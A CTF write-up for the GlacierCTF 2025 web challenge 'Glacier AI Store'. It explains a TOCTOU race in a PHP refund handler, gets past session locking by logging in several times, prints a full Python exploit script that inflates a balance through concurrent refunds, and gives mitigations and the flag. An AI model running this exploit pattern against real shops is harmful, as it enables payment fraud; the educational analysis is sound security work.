web/Glacier AI Store - GlacierCTF 2025

GlacierCTF 2025 featured intense competition across Open and Academic brackets. I had the opportunity to participate and want to share my solution for Glacier AI Store, a web challenge that required exploiting a classic race condition.

Challenge Description

Category: Web

Author: sc0peMa3str0

Description: 2024 called and want back their casual websites, where you need to manually navigate through the page. This year, we introduce Glacier AI Store, where we use AI to navigate a website. Never browse through sub-sub-sub navigation bars again. Check out our new products. We apologize again to those customers, who paid for products but couldn’t see them in their order list. We hired the best PHP vibe coders on the market and resolved the issue.

Initial Recon

The challenge presents a web application that simulates an “AI” chat interface for navigation. Behind the scenes, it’s a PHP application using iframes to load content based on navigation commands.

Glacier AI Store Homepage

The goal is to buy the “Glacier Flag”, which costs 1000 credits. We start with only 1 credit.

Source Code Analysis

We are provided with the source code. The core logic resides in web/nav/pages/products.php:

1
<?php
2

3
if(!isLoggedIn()) {
4
  respondText($SYSTEM, "You are not logged in.");
5
  sendCtrl("ACCOUNT_NOSESSION");
6
  exit(0);
7
}
8

9
$sell = $_POST["sell"];
10
$reason = $_POST["reason"];
11
if(isset($sell) && array_key_exists($sell, $products)) {
12
  respondText($USER, "Cancel Order for product " . $products[$sell]["title"]);
13
  respondText($SYSTEM, "Cancelling Order for product " . $products[$sell]["title"]);
14

15
  $loginID = getLoginID();
16
  if(!hasUserProduct($loginID, $sell)) goto product_list;
17
  increaseBalance($loginID, $products[$sell]["price"]);
18
  if(isset($reason) && strlen($reason) > 0)
19
    respondText($USER, $reason);
20
  sellProduct($loginID, $sell, $reason);
21
  goto product_list;
22
}
23

24
$product = $_SESSION["product"];
25
$btn = $_POST["btn"];
26
if(isset($product) && isset($btn) && array_key_exists($product, $products)) {
27
  unset($_SESSION["product"]);
28
  if($btn === "yes") {
29
    $loginID = getLoginID();
30
    if(decreaseBalance($loginID, $products[$product]["price"])) {
31
      respondText($USER, $btn);
32
      buyProduct($loginID, $product);
33
      respondText($SYSTEM, "Great, we have received your order.");
34
    } else {
35
      respondText($SYSTEM, "Oh snap, seems like you don't have enough balance to buy this product.");
36
    }
37
  }
38
  goto product_list;
39
}
40

41
$product = $_POST["product"];
42
if(isset($product) && array_key_exists($product, $products)) {
43
  $_SESSION["product"] = $product;
44
  respondText($USER, "Order product " . $products[$product]["title"]);
45
  respondText($SYSTEM, "Are you sure you want to buy the product?");
46
  sendCtrl("PRODUCT_BUY");
47
} else {
48
  respondText($SYSTEM, "I'll forward you to the store, where you can order new products and view your orders.");
49
}
50

51
exit(0);
52
# https://xkcd.com/292/
53
product_list:
54
  sendCtrl("PRODUCT_LIST");
55

56
?>

The Vulnerability: Race Condition (TOCTOU)

The vulnerability is a classic Race Condition, specifically a Time-of-Check to Time-of-Use (TOCTOU) flaw.

What is a Race Condition?

A race condition occurs when a software system’s behavior depends on the timing or ordering of events, such as the execution order of concurrent threads or processes. When multiple processes access and manipulate shared data (like a database or file) at the same time, unexpected behavior can occur if the operations are not atomic or properly synchronized.

Time-of-Check to Time-of-Use (TOCTOU)

TOCTOU is a specific type of race condition where a program checks the state of a resource (Time-of-Check) and then performs an action based on that state (Time-of-Use), but the state changes between the check and the use.

In this challenge, the “Check” is verifying if the user owns the product, and the “Use” (or rather, the finalization) is removing the product.

The Flaw in products.php

To understand the vulnerability, we first need to look at the respondText helper function in web/helpers/utils.php. This function is designed to simulate an AI typing effect by streaming text with a delay:

1
function respondText($type, $msg="") {
2
  $textToStream = $type . $msg;
3
  for($i = 0; $i < strlen($textToStream); $i++) {
4
    echo $textToStream[$i];
5
    usleep(50000);
6
    ob_flush();
7
    flush();
8
  }
9
}

This usleep(50000) introduces a 50ms delay per character.

Now, let’s look at the refund logic in web/nav/pages/products.php. Notice how it accepts a user-controlled reason parameter and passes it to respondText after refunding the money but before deleting the product:

11
if(isset($sell) && array_key_exists($sell, $products)) {
12
  respondText($USER, "Cancel Order for product " . $products[$sell]["title"]);
13
  respondText($SYSTEM, "Cancelling Order for product " . $products[$sell]["title"]);
14

15
  $loginID = getLoginID();
16

17

18
  if(!hasUserProduct($loginID, $sell)) goto product_list;
19

20

21
  increaseBalance($loginID, $products[$sell]["price"]);
22

23

24
  if(isset($reason) && strlen($reason) > 0)
25
    respondText($USER, $reason);
26

27

28
  sellProduct($loginID, $sell, $reason);
29
  goto product_list;
30
}

By sending a long reason string (e.g., 100 characters), we can force the server to wait for 5 seconds between the refund and the deletion. This creates a massive window for a race condition.

Visualizing the Attack

If we send two requests (Req A and Req B) simultaneously:

Time	Request A	Request B	State (Balance / Inventory)
T+0s	Check: Owns product? YES		0 / [Stone]
T+0.1s	Refund: Balance +1	Check: Owns product? YES	1 / [Stone]
T+0.2s	Delay: Sleeping…	Refund: Balance +1	2 / [Stone]
T+0.3s	Delay: Sleeping…	Delay: Sleeping…	2 / [Stone]
…	…	…	…
T+5.0s	Delete: Remove product	Delay: Sleeping…	2 / []
T+5.1s	Done	Delete: Remove product (Fail)	2 / []

Because Request B performs its check before Request A deletes the product, both requests successfully refund the money for the same single item.

Bypassing PHP Session Locking

PHP by default locks the session file for a given session ID, serializing requests from the same user. This means Request B would normally wait for Request A to finish before starting, preventing the race condition.

To bypass this, we can log in to the same account multiple times using different session cookies (PHPSESSID). The application allows multiple active sessions for the same user, allowing us to send truly concurrent requests.

Exploit Strategy

Register a user.
Create Multiple Sessions: Log in 10 times to get 10 different session cookies.
Buy a cheap item (Glacier Stone, price 1).
Race: Send concurrent sell requests from all 10 sessions.
- Include a long reason string (e.g., 100 ‘A’s) to introduce a 5-second delay.
- Stagger the requests slightly (0.1s) to ensure they all hit within the delay window.
Repeat: As balance grows, buy more expensive items (Water: 10, Jar: 100) to reach the target faster.
Profit: Once balance >= 1000, buy the flag.

Exploit Script

Here is the full Python exploit script:


120 collapsed lines
1
import urllib.request
2
import urllib.parse
3
import http.cookiejar
4
import threading
5
import time
6
import re
7
import sys
8
import string
9
import random
10

11
URL = "http://localhost:8000"
12

13
# Endpoints
14
EP_ACCOUNT_FRAME = "/nav/index.php?p=252"  # 0xFC
15
EP_PRODUCTS_FRAME = "/nav/index.php?p=253"  # 0xFD
16
EP_PRODUCTS_PAGE = "/nav/index.php?p=145"  # 0x91
17

18
USERNAME = "hacker4053"
19
PASSWORD = "s4E5_MK3Hzy0"
20

21

22
def get_opener():
23
    cj = http.cookiejar.CookieJar()
24
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
25
    return opener
26

27

28
def register():
29
    print(f"[*] Registering user {USERNAME}...")
30
    data = urllib.parse.urlencode(
31
        {
32
            "form": "register",
33
            "username": USERNAME,
34
            "password": PASSWORD,
35
            "password_repeat": PASSWORD,
36
        }
37
    ).encode()
38

39
    try:
40
        with urllib.request.urlopen(f"{URL}{EP_ACCOUNT_FRAME}", data=data) as response:
41
            html = response.read().decode()
42
            if "Registration successful" in html:
43
                print("[+] Registration successful")
44
                return True
45
            else:
46
                print("[-] Registration failed (might already exist)")
47
                return False
48
    except Exception as e:
49
        print(f"[-] Registration error: {e}")
50
        return False
51

52

53
def login():
54
    opener = get_opener()
55
    data = urllib.parse.urlencode(
56
        {"form": "login", "username": USERNAME, "password": PASSWORD}
57
    ).encode()
58

59
    try:
60
        with opener.open(f"{URL}{EP_ACCOUNT_FRAME}", data=data) as response:
61
            html = response.read().decode()
62
            if "Login failed" in html:
63
                return None
64

65
        # Verify by checking products frame
66
        with opener.open(f"{URL}{EP_PRODUCTS_FRAME}") as response:
67
            html = response.read().decode()
68
            if "Current Balance" in html:
69
                return opener
70
    except Exception as e:
71
        print(f"[-] Login error: {e}")
72
        return None
73
    return None
74

75

76
def get_balance(opener):
77
    try:
78
        with opener.open(f"{URL}{EP_PRODUCTS_FRAME}") as response:
79
            html = response.read().decode()
80
            match = re.search(r"Current Balance: (\d+) &euro;", html)
81
            if match:
82
                return int(match.group(1))
83
    except:
84
        pass
85
    return 0
86

87

88
def buy_product(opener, product="stone"):
89
    try:
90
        # Step 1: Select
91
        data1 = urllib.parse.urlencode({"product": product}).encode()
92
        opener.open(f"{URL}{EP_PRODUCTS_PAGE}", data=data1).read()
93

94
        # Step 2: Confirm
95
        data2 = urllib.parse.urlencode({"btn": "yes"}).encode()
96
        with opener.open(f"{URL}{EP_PRODUCTS_PAGE}", data=data2) as response:
97
            html = response.read().decode("latin-1")
98
            if "Great, we have received your order" in html:
99
                return True
100
    except Exception:
101
        pass
102
    return False
103

104

105
def sell_product(opener, product="stone", barrier=None, use_reason=False):
106
    try:
107
        if barrier:
108
            barrier.wait()
109

110
        params = {"sell": product}
111
        if use_reason:
112
            params["reason"] = "A" * 100  # 5 seconds delay
113

114
        data = urllib.parse.urlencode(params).encode()
115
        with opener.open(f"{URL}{EP_PRODUCTS_PAGE}", data=data) as response:
116
            response.read()  # Consume response
117
    except Exception:
118
        pass
119

120

121
def attempt_exploit():
122
    if not register():
123
        pass  # Try login if register fails
124

125
    # Create multiple sessions
126
    sessions = []
127
    print("[*] Creating sessions...")
128
    for i in range(10):
129
        s = login()
130
        if s:
131
            sessions.append(s)
132

133
    if len(sessions) < 2:
134
        print("[-] Not enough sessions")
135
        return False
136

137
    print(f"[+] Created {len(sessions)} sessions")
138
    print(f"[+] Initial Balance: {get_balance(sessions[0])}")
139

140
    target_balance = 1000
141
    num_threads = 10
142

143
    while True:
144
        balance = get_balance(sessions[0])
145
        print(f"[*] Current Balance: {balance}")
146

147
        if balance >= target_balance:
148
            print("[+] Target balance reached!")
149
            break
150

151
        # Dynamic product selection
152
        product = "stone"
153
        if balance >= 100:
154
            product = "jar"
155
        elif balance >= 10:
156
            product = "water"
157

158
        print(f"[*] Using product: {product}")
159

160
        # Buy product
161
        price = 1
162
        if product == "water":
163
            price = 10
164
        if product == "jar":
165
            price = 100
166

167
        if balance >= price:
168
            if not buy_product(sessions[0], product):
169
                print(f"[-] Failed to buy {product}")
170
                continue
171
        elif balance == 0:
172
            pass  # Assume we have product
173

174
        # Race condition
175
        threads = []
176
        active_sessions = sessions[:num_threads]
177
        for s in active_sessions:
178
            t = threading.Thread(target=sell_product, args=(s, product, None, True))
179
            threads.append(t)
180
            t.start()
181
            time.sleep(0.1)  # Stagger
182

183
        for t in threads:
184
            t.join()
185

186
    # Buy Flag
187
    print("[*] Buying Flag...")
188
    try:
189
        data1 = urllib.parse.urlencode({"product": "flag"}).encode()
190
        sessions[0].open(f"{URL}{EP_PRODUCTS_PAGE}", data=data1).read()
191

192
        data2 = urllib.parse.urlencode({"btn": "yes"}).encode()
193
        sessions[0].open(f"{URL}{EP_PRODUCTS_PAGE}", data=data2).read()
194

195
        with sessions[0].open(f"{URL}{EP_PRODUCTS_FRAME}") as response:
196
            html = response.read().decode("latin-1")
197
            match = re.search(
198
                r"<td>Glacier Flag</td>\s*<td>(.*?)</td>", html, re.DOTALL
199
            )
200
            if match:
201
                print(f"\n[SUCCESS] FLAG: {match.group(1).strip()}\n")
202
                return True
203
            else:
204
                print("[-] Could not find flag in table")
205
    except Exception as e:
206
        print(f"[-] Error buying flag: {e}")
207

208
    return False
209

210

211
if __name__ == "__main__":
212
    attempt_exploit()

Mitigation

To prevent this vulnerability, two main steps should be taken:

Atomic Transactions: Use database transactions with proper locking (e.g., SELECT ... FOR UPDATE) to ensure that the check-and-update process is atomic. This prevents other requests from reading the balance until the current transaction is complete.
Session Locking: Do not rely solely on implicit PHP session locking, as it can be bypassed (as shown in this exploit) or disabled for performance. Instead, use explicit locking mechanisms:
- Database Row Locks: Lock the specific user record during critical sections of the code.
- Distributed Locks: Use a fast, in-memory store (like Redis or Memcached) to implement a mutex. By acquiring a lock on the user_id before processing, you ensure sequential execution across all server instances.

Conclusion

This challenge serves as a stark reminder that even seemingly minor logic flaws can be exploited to bypass security controls and lead to significant gain for an attacker. Developers must proactively implement explicit locking mechanisms to safeguard against race conditions and ensure data integrity in multi-user environments.

Flag: gctf{pHP_G3tZ_W3iRD_Wh3n_y0U_D!SsC0nN3Ct_m0K9Pa5shMpOO3Mq}